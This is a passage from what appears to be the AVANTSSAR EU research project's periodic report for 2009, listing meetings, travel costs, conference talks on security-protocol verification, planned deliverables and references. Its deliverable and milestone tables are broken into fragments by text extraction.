ETH Zurich, Zurich, Switzerland.January 11–17, 2009.Instituto Superior Tecnico IST, Lisboa, Portugal.January 17–25, 2009.Meeting of UNIVR and ETH Zurich with researchers at IST to work on adistributed temporal logic for the analysis of security protocols and services(WP2–6).

Participant: Departure place: Costs/€:Luca Viganò (UNIVR) Verona 1126.96David Basin (ETH Zurich) Zurich 0.00Carlos Caleiro (IST) Lisbon 0.00Jaime Ramos (IST) Lisbon 0.00



6.4.2 Technical meeting on WP5: SAML SSO

University of Genova, Italy.January 26-28, 2009.Meeting of UGDIST and SAP researchers at the University of Genova (WP2–6). Discussed how to jointly progress on the SAML 2.0 SSO subject. Brain-storming on model checking security-relevant aspects of business processes

Participant: Departure place: Costs/€:Alessandro Armando (UGDIST) Genova 0.00Roberto Carbone (UGDIST) Genova 0.00Serena Ponta (UGDIST) Genova 0.00Luca Compagna (SAP) Nice 466.40



6.4.3 Meeting on model-checking for authorization policies

University of Milan, Italy.January 30, 2009.Meeting of UNIVR and researchers at the University of Milan on authoriza-tion policies (WP2–6).

Participant: Departure place: Costs/€:Michele Barletta (UNIVR) Verona 29.85Silvio Ranise (UNIVR) Milano 0.00



6.4.4 Meeting on orchestration work

Nancy, France.March 12, 2009.Meeting of INRIA and OpenTrust on the Orchestration tool.

Participant: Departure place: Costs/€:Phouric Ung (OpenTrust) Paris 78,50Mohamed Mehdi Bouallagui (Opentrust) Paris 78.50



6.4.5 Working Meeting on WP6.2: SAP NW BPM

Karlsruhe, Germany.April 20–23, 2009.Various meetings at SAP Research Karlsruhe to discuss and to progress onthe industry migration initiative about NW BPM.

Participant: Departure place: Costs/€:Wihem Arsac (SAP) Nice 820.44



6.4.6 Meeting on secure pseudonymous channels

IBM, Zurich, Switzerland.June 08–14, 2009.Meeting of UNIVR and IBM to work on the definition of secure pseudony-mous channels (WP2–6).

Participant: Departure place: Costs/€:Luca Viganò (UNIVR) Verona 457.66Sebastian Mödersheim (IBM) Zurich 0.00



6.4.7 Definition and application of a distributed temporal logicfor the analysis of security protocols and services

Instituto Superior Tecnico IST, Lisboa, Portugal.July 07–20, 2009.Meeting of UNIVR and ETH Zurich with researchers at IST to work on adistributed temporal logic for the analysis of security protocols and services(WP2–6).

Participant: Departure place: Costs/€:Luca Viganò (UNIVR) Verona 885.19David Basin (ETH Zurich) Zurich 0.00Carlos Caleiro (IST) Lisbon 0.00Jaime Ramos (IST) Lisbon 0.00



6.4.8 AVANTSSAR technical synchronization meeting on WP4and WP6

Sophia Antipolis, France.August 25-26, 2009.Meeting of UGDIST and SAP researchers at the SAP Labs France. (WP2–6).Discussed the AVANTSSAR Validation Platform with respect to the formalvalidation aspect (no orchestration). Also discussed how to jointly progresson the Model Checking Security-Relevant aspects of Business Processes sub-ject whose outcomes are having significant impact on the industry migrationpath of SAP.

Participant: Departure place: Costs/€:Alessandro Armando (UGDIST) Genova 427.87Luca Compagna (SAP) Nice 91.94(∗)

Xavier Chantry (SAP) Nice 0.00

(*) This includes the cost of 3 dinners for SAP researchers participating tothe official dinner with Prof. Alessandro Armando.



6.4.9 Working Meeting on Dynamic Policies, Services, and Com-position

SAP Sophia Antipolis, France.September 10–11, 2009.Meeting of UNIVR, ETH Zurich, UGDIST and SAP on dynamic policies,services, and composition (WP2–6).

Participant: Departure place: Costs/€:Luca Viganò (UNIVR) Verona 332.79Mohammad Torabi Dashti (ETH Zurich) Zurich 638.50Alessandro Armando (UGDIST) Genova 532.24(†)

Roberto Carbone (UGDIST) Genova 38.06Serena Ponta (UGDIST) Genova 44.96Wihem Arsac (SAP) Sophia Antipolis 0.00Luca Compagna (SAP) Sophia Antipolis 102.92(∗)

Keqin Li (SAP) Sophia Antipolis 0.00

(†) This includes the cost of the car used also by all meeting participantsdeparting from Genova.(∗) This includes the cost of 4 dinners for SAP researchers participating tothe two business dinners that took place.



6.4.10 Working Meeting on WP2 and WP3

ETH Zurich, Switzerland.October 26–28, 2009.Meeting of UNIVR and ETH Zurich on WP2 and WP3.

Participant: Departure place: Costs/€:Silvio Ranise (UNIVR) Milano 178.00Cas Cremers (ETH Zurich) Zurich 0.00Simone Frau (ETH Zurich) Zurich 0.00Mohammad Torabi Dashti (ETH Zurich) Zurich 0.00

Silvio Ranise was invited by ETH Zurich, which covered the costs.



6.4.11 Working Meeting on WP4 and WP5

ETH Zurich and IBM Research Lab Zurich, Switzerland.November 16–22, 2009.Meeting of UNIVR, ETH Zurich, IBM on WP4 and WP5.

Participant: Departure place: Costs/€:Alessandra Di Pierro (UNIVR) Verona 360.21Luca Viganò (UNIVR) Verona 302.58Cas Cremers (ETH Zurich) Zurich 0.00David Basin (ETH Zurich) Zurich 0.00Simone Frau (ETH Zurich) Zurich 0.00Mohammad Torabi Dashti (ETH Zurich) Zurich 0.00Sebastian Mödersheim (IBM) Zurich 0.00



6.4.12 Working Meeting on WP6.2: SAP NW NGSSO and SAPNW BPM

Walldorf, Germany.November 26-27, 2009.Various meetings in WDF to discuss the two SAP industry migration initia-tives on NW SAML NGSSO and NW BPM.

Participant: Departure place: Costs/€:Luca Compagna (SAP) Nice 994.98(∗)

(*) This trip was part of another trip to FIA Stockholm and Workshop withthe SHIELDS Project (see Subsection 6.5).



6.5 Participation to European and scientific events6.5.1 6th ACM Workshop on Formal Methods in Security Engi-

neering (FMSE 2008) co-located with Computer Communi-cation Security

Hilton Alexandria Mark Center, Virginia, USA.October 27–31, 2008.Participation to the workshop FMSE with a talk about [ACC+08] and at-tendance of the main conference CCS.

Participant: Departure place: Costs/€:Luca Compagna (SAP) Sophia Antipolis 0.00Alessandro Armando (UGDIST) Genova 2539.55Roberto Carbone (UGDIST) Genova 2624.21

The costs associated with the participation of Luca Compagna has beenalready reported in the 1st Reporting Period (cf. [AVA08a]).



6.5.2 ARES’09

4th International Conference on Availability, Reliability and Security (ARES),Fukuoka, Japan.March 16th - 19th, 2009.Presentation of [24] by Sebastian Mödersheim.

Participant: Departure place: Costs/€:Sebastian Mödersheim (IBM) Zurich 2790.98



6.5.3 ARSPA-WITS’09 and working meeting at Imperial College

University of York and Imperial College London, UK.March 25 – April 06, 2009.Participation to ARSPA-WITS’09 (Luca Viganò co-chair of the workshop)and working meeting with researchers at Imperial College. Xavier Chantrypresented [8] to ARSPA-WITS’09.

Participant: Departure place: Costs/€:Luca Viganò (UNIVR) Verona 1176.06Xavier Chantry (SAP) Nice 662.69(∗)

Luca Compagna (SAP) Nice 1221.71(∗)

(*) It is important to point out that: (a) the numbers reported for SAP peo-ple comprise the cost of one trip to UK where two different events ARSPA-WITS’09 and IWSP 2009 have been attended, and (b) originally Luca Com-pagna was supposed to travel and to attend the two events, but due to aserious injury, Xavier Chantry took over the trip and attendance.



6.5.4 IWSP 2009, 17th International Workshop on Security Pro-tocols

Cambridge, UK.April 01 – April 03, 2009.Participation to IWSP 2009, 17th International Workshop on Security Pro-tocols where Xavier Chantry presented [7].

Participant: Departure place: Costs/€:Xavier Chantry (SAP) Nice 662.69(∗)

Luca Compagna (SAP) Nice 1221.71(∗)

(*) It is important to point out that: (a) the numbers reported for SAP peo-ple comprise the cost of one trip to UK where two different events ARSPA-WITS’09 and IWSP 2009 have been attended, and (b) originally Luca Com-pagna was supposed to travel and to attend the two events, but due to aserious injury Xavier Chantry took over the trip and attendance.



6.5.5 Future Internet Conference Prague 2009

Prague, Czech Republic.May 10–13, 2009.

Luca Viganò gave an invited keynote at the Trust and Identity Session “Iden-tity Provisioning in service platforms”, and participated to a panel in theSession “Trust Platforms”.Alessandro Sorniotti presented the the demo of the discovery of the seriousvulnerability to SAML-based SSO for Google Apps as part of the SAP boothat FIA Prague.

Participant: Departure place: Costs/€:Luca Viganò (UNIVR) Verona 763.51Alessandro Sorniotti (SAP) Nice 823.00



6.5.6 Applied Cryptography and Network Security, 7th Interna-tional Conference

Paris-Rocquencourt, France.June 2–5, 2009.Participation to the ACNS’09 Conference.

Participant: Departure place: Costs/€:Cas Cremers (ETH Zurich) Zurich 212.50



6.5.7 9th International School on Formal Methods for the Designof Computer, Communication and Software Systems: WebServices (SFM-09:WS)

Centro Universitario Residenziale di Bertinoro, FC, Italy.June 1–6, 2009.Participation to the school

Participant: Departure place: Costs/€:Serena Elisa Ponta (UGDIST) Genova 1019.40



6.5.8 Cinquièmes Journées Francophones MODÈLES FORMELSde l’INTERACTION (MFI’09)

Lannion, France.June 3–5, 2009.Participation and presentation of [11].

Participant: Departure place: Costs/€:Pablo Seban (UPS-IRIT) Toulouse 390.00Guillaume Feuillade (UPS-IRIT) Toulouse 650.00



6.5.9 Conference on Automated Reasoning with Analytic Tableauxand Related Methods (Tableaux) and Workshop on First-Order Theorem Proving (FTP) 2009

Oslo, Norway.July 05–20, 2009.Participation to Tableaux and FTP

Participant: Departure place: Costs/€:Silvio Ranise (UNIVR) Milano 1159.27



6.5.10 Logic Colloquium 2009

Sofia, Bulgaria.July-August 2009.Invited presentation.

Participant: Departure place: Costs/€:Philippe Balbiani (UPS-IRIT) Toulouse 958.04



6.5.11 9th International School on Foundations of Security Anal-ysis and Design (FOSAD)

Centro Universitario Residenziale di Bertinoro, FC, Italy.August 29 – September 04, 2009.Participation to the school and associated workshop: Luca Viganò: invitedlecture on “On-the-Fly Model Checking of Security Protocols and Web Ser-vices”(participation of Alessandra Di Pierro and Luca Viganò paid by theschool); Michele Barletta: talk on paper “Verifying the Interplay of Autho-rization Policies and Workflow in Service-Oriented Architectures”.

Participant: Departure place: Costs/€:Michele Barletta (UNIVR) Verona 586.70Alessandra Di Pierro (UNIVR) Verona 0.00Luca Viganò (UNIVR) Verona 0.00



6.5.12 6th International Conference on Trust, Privacy and Secu-rity in Digital Business (TrustBus’09)

Linz, Austria.August 31–September 4, 2009.Presentation of [4] by Serena Elisa Ponta.

Participant: Departure place: Costs/€:Serena Elisa Ponta (UGDIST) Genova 1011.67



6.5.13 12th International Information Security Conference 2009

Pisa, Italy.September 7–9, 2009.Participation to ISC’09:Marius Minea: talk on paper “A calculus to detect guessing attacks”.

Participant: Departure place: Costs/€:Marius Minea (IEAT) Brussels 0.00



6.5.14 Summer School on Provable Security

Barcelona, Spain.September 7–11, 2009.Participation to the summer school: Bogdan Groza

Participant: Departure place: Costs/€:Bogdan Groza (IEAT) Timişoara 250.00



6.5.15 ESORICS’09

14th European Symposium on Research in Computer Security (ESORICS).Saint Malo, France.September 21–23, 2009.Presentation of [25] by Sebastian Mödersheim.

Participant: Departure place: Costs/€:Sebastian Mödersheim (IBM) Zurich 1660.85



6.5.16 4th International Conference on Risks and Security of In-ternet and Systems 2009 (CRISIS 2009)

Toulouse, France.October 19–22, 2009.Presentation of [10].

Participant: Departure place: Costs/€:Marwa El Houri (UPS-IRIT) Toulouse 120.00



6.5.17 Stabilization, Safety, and Security of Distributed Systems,11th International Symposium, SSS 2009

Lyon, France.November 3–6, 2009.Presenting [30] at SSS 2009

Participant: Departure place: Costs/€:Mohammad Torabi Dashti (ETH Zurich) Zurich 332.50



6.5.18 FAST’09

6th International Workshop on Formal Aspects in Security and Trust (FAST).Eindhoven, the Netherlands.November 5–6, 2009.Presentation of [16] by Mohamed Anis Mekki.Presentation of [5] by Serena Elisa Ponta.Presentation of [15] by Sebastian Mödersheim.

Participant: Departure place: Costs/€:Mohamed Anis Mekki (INRIA) Nancy 0.00Serena Elisa Ponta (UGDIST) Genova 827.61Sebastian Mödersheim (IBM) Zurich 984.47



6.5.19 Methods for Modalities (M4M 2009)

Copenhagen, Denmark.November 12–14, 2009.Presentation of [12]

Participant: Departure place: Costs/€:Guillaume Feuillade (UPS-IRIT) Toulouse 1250.94



6.5.20 FIA Stockholm and Workshop with the SHIELDS Project

Stockholm, Sweden.November 22–27, 2009.Participation to FIA Stockholm and workshop with Nahid Shahmehri andDavid Byers of the SHIELDS project.

Participant: Departure place: Costs/€:Luca Viganò (UNIVR) Verona 1435.29Luca Compagna (SAP) Nice 994.98(∗)

(*) This trip included an AVANTSSAR working meeting on WP6 that tookplace in Walldorf on November 26-27 (see Subsection 6.4).



7 Planned work for the next reporting periodThe next, and final, reporting period (01.01.2010 — 31.12.2010) will bemainly devoted to the completion of the project in order to achieve all theobjectives listed in the Description of Work. In particular, we will: extendASLan so to be able to fully specify trust and security properties of services,their associated policies, and their composition into service architectures; de-velop a number of automated techniques to reason about services, their as-sociated security policies, and their dynamic composition into secure servicearchitectures; implement and deploy the AVANTSSAR Validation Platform,and apply it to the industrial case studies; publish a library of validatedcomposed services and service architectures; migrate project results to in-dustry, integrating them into service-oriented applications developed at ourindustrial partners, and disseminate them to standardization organizations.

The 13 deliverables due in Period P3 are shown in Table 44, together withthe ongoing deliverable D6.1, and the 2 milestones of Period P3 are shownin Table 45.



Table44

:Deliverab

lesdu

ein

Perio

dP3

Del.

no.

Deliverab

lena

me

WP

no.

Lead

bene

ficiary

Nature

Dissemination

level

Deliveryda

tefrom

Ann

exI

(projmon

th)

Delivered

Yes/N

oActua

l/Fo

recast

deliv

eryda

teCom

ments

D1.5

Fina

lProject

Rep

ort

1UNIV

RR

PU36

D1.6

Fina

lDiss

emination

andUse

Plan

1UNIV

RR

PU36

D1.7

Techno

logy

Implem

en-

tatio

nPlan

1SA

PR

PU36

D2.3

ASL

anfin

alversion

with

dyna

mic

service

andpo

licycompo

sition

2ET

HZu

rich

RPU

30

D3.1

Decision

procedures

for

service

synthe

sisan

dsatis

fiability

ofASL

anpo

licies

3UPS

-IRIT

RPU

30

D3.2

Mod

el-che

cking

tech-

niqu

es3

UPS

-IRIT

RPU

32

D3.4

Abstractio

nan

dcom-

posit

iona

lreason

ing

techniqu

esfor

service

analysis

3IN

RIA

RPU

34

D4.2

AVANTSS

AR

Valid

a-tio

nPlatform

v.2

4UGDIST

R&P

PU36

D5.2

Form

alise

dprob

lem

cases

5SA

PR&O

RE

30

D5.3

AVANTSS

AR

Library

ofvalid

ated

prob

lem

cases

5SA

PR&O

RE

36

D5.4

Assessm

ent

ofthe

AVANTSS

AR

Valid

a-tio

nPlatform

5SA

PR

PU36

D6.1

AVANTSS

AR

Web

site

andPa

ckage

6UNIV

RO

PU1–

36Ye

sThe

website

isbe

ing

upda

tedregu

larly

D6.2.3

Migratio

nto

indu

stria

ldevelopm

ent

environ-

ments:lesson

slearned

andbe

st-practices

6SA

PR

PU36

D6.3

Migratio

nto

stan

dard-

isatio

nbo

dies

6SIEM

ENS

RPU

36



Table45

:Mile

ston

es(and

decisio

npo

ints)of

Perio

dP2

Mile

ston

eno

.Mile

ston

ena

me

WPsno

’s.

Lead

bene

ficiary

Deliveryda

tefrom

Ann

exI

(projmon

th)

Achieved

Yes/N

oActua

l/Fo

recast

deliv

eryda

teCom

ments

MS5

ASL

anfin

alversion,

Decidab

ility

results

,Fo

rmalise

dprob

lem

cases,

and

AVANTS-

SAR

inindu

stry

2,3,

5,6

SAP

mon

th30

(third

syn-

chronizatio

nmeetin

g)

MS6

Fina

lassessment,

Mi-

grationto

indu

stry

and

stan

dardisa

tionorga

ni-

satio

ns,Fina

lDiss

em-

ination

and

Use

Plan

,an

dTe

chno

logy

Imple-

mentatio

nplan

1,2,

3,4,

5,6

UNIV

Rmon

th36

(third

review

meetin

g)



8 Financial statements – Forms C and Sum-mary financial report (signed originals sentin parallel by post)

Financial statements for all beneficiaries have been submitted using NEF andsigned copies will be sent in the next days.



9 Certificates (signed originals sent in paral-lel by post)

Does not apply.



References[AC08] Alessandro Armando and Luca Compagna. SAT-based Model-

Checking for Security Protocols Analysis. International Journalof Information Security, 7(1):3–32, 2008.

[ACC07] Alessandro Armando, Roberto Carbone, and Luca Compagna.LTL Model Checking for Security Protocols. In Proceedingsof the 20th IEEE Computer Security Foundations Symposium(CSF20). IEEE Computer Society Press, 2007.

[ACC+08] Alessandro Armando, Roberto Carbone, Luca Compagna, JorgeCuellar, and Llanos Tobarra Abad. Formal Analysis of SAML2.0 Web Browser Single Sign-On: Breaking the SAML-basedSingle Sign-On for Google Apps. In Proceedings of the 6th ACMWorkshop on Formal Methods in Security Engineering (FMSE2008). ACM Press, 2008.

[AVA08a] AVANTSSAR. Deliverable 1.3: Progress/Assessment Report forYear 1. Available at http://www.avantssar.eu, 2008.

[AVA08b] AVANTSSAR. Deliverable 2.1: Requirements for modelling andASLan v.1. Available at http://www.avantssar.eu, 2008.

[AVA08c] AVANTSSAR. Deliverable 5.1: Problem cases and theirtrust and security requirements. Available at http://www.avantssar.eu, 2008.

[AVA09a] AVANTSSAR. Deliverable 4.1: AVANTSSAR Validation Plat-form v.1. Available at http://www.avantssar.eu, 2009.

[AVA09b] AVANTSSAR. Deliverable 2.2: ASLan v.2 with static serviceand policy composition. Available at http://www.avantssar.eu, 2009.

[BCF07] Philippe Balbiani, Fahima Cheikh, and Guillaume Feuillade.Considérations relatives à la décidabilité et à la complexité duproblème de la composition de services. In Proceedings of theJournées Francophones Modèles formels de l’Interaction (MFI2007), pages 261–268, Paris, France, 2007. Annales du LAM-SADE.



[BCF08a] Philippe Balbiani, Fahima Cheikh, and Guillaume Feuillade.Composition of interactive web services based on controller syn-thesis. 2nd International Workshop on Web Service Compositionand Adaptation (WSCA 08), 0(0):521–528, 2008.

[BCF08b] Philippe Balbiani, Fahima Cheikh, and Guillaume Feuillade.Composition of web services: algorithms and complexity. 1st In-teraction and Concurrency Experience (ICE 08), 0:96–107, 2008.

[BG01] David Basin and Harald Ganzinger. Automated complexityanalysis based on ordered resolution. J. ACM, 48(1):70–109,2001.

[BCDP08] Daniele Berardi, Fahima Cheikh, Giuseppe DeGiacomo, andFabio Patrizi. Automatic service composition via simulation.International Journal of Foundations of Computer Science,19(2):429–451, 2008.

[BCCZ99] A. Biere, A. Cimatti, E. Clarke, and Y. Zhu. Symbolic ModelChecking without BDDs. In Proceedings of TACAS’99, LNCS1579, pages 193–207. Springer-Verlag, 1999.

[Bla01] B. Blanchet. An efficient cryptographic protocol verifier basedon Prolog rules. In csfw01, pages 82–96. ieeecoso, 2001.

[BHKO04] Y. Boichut, P.-C. Heam, O. Kouchnarenko, and F. Oehl. Im-provements on the Genet and Klay Technique to AutomaticallyVerify Security Protocols. In Proc. Int. Workshop on Auto-mated Verification of Infinite-State Systems (AVIS’2004), jointto ETAPS’04, pages 1–11, Barcelona, Spain, 2004. The final ver-sion will be published in EN in Theoretical Computer Science,Elsevier.

[CMR08] Yannick Chevalier, Mohammed Anis Mekki, and Michaël Rusi-nowitch. Automatic Composition of Services with Security Poli-cies. In Jyothishman Pathak, Samik Basu, Marco Pistore,Prashant Doshi, and Rama Akkiraju, editors, Web Service Com-position and Adaptation Workshop (held in conjunction withSCC/SERVICES-2008), pages 529–537, 2008. IEEE.

[CLC03] H. Comon-Lundh and V. Cortier. New decidability results forfragments of first-order logic and application to cryptographic



protocols. Technical Report LSV-03-3, Laboratoire Specifica-tion and Verification, ENS de Cachan, Cachan, France, January2003.

[Con] Oasis Consortium. Universal Description, Discovery, and In-tegration specification. http://uddi.org/pubs/uddi-v3.0.2-20041019.pdf.

[Cra05] Jason Crampton. Understanding and developing role-based ad-ministrative models. In CCS ’05: Proceedings of the 12th ACMconference on Computer and communications security, pages158–167, New York, NY, USA, 2005. ACM.

[GMM05] Paolo Giorgini, Fabio Massacci, and John Mylopoulos. Mod-eling security requirements through ownership, permission anddelegation. In Proc. of RE’05, pages 167–176. IEEE Press, 2005.

[OAS05a] OASIS. Conformance Requirements for the OASIS Security As-sertion Markup Language (SAML) V2.0. Available at http://www.oasis-open.org, March 2005.

[OAS05b] OASIS. Profiles for the OASIS Security Assertion Markup Lan-guage (SAML) V2.0. Available at http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=security, March2005.


PROJECT PERIODIC REPORT - avantssar.euavantssar.eu/pdf/deliverables/avantssar-ppr-P2.pdf · 3.1.5...

Documents

Transcript of PROJECT PERIODIC REPORT - avantssar.euavantssar.eu/pdf/deliverables/avantssar-ppr-P2.pdf · 3.1.5...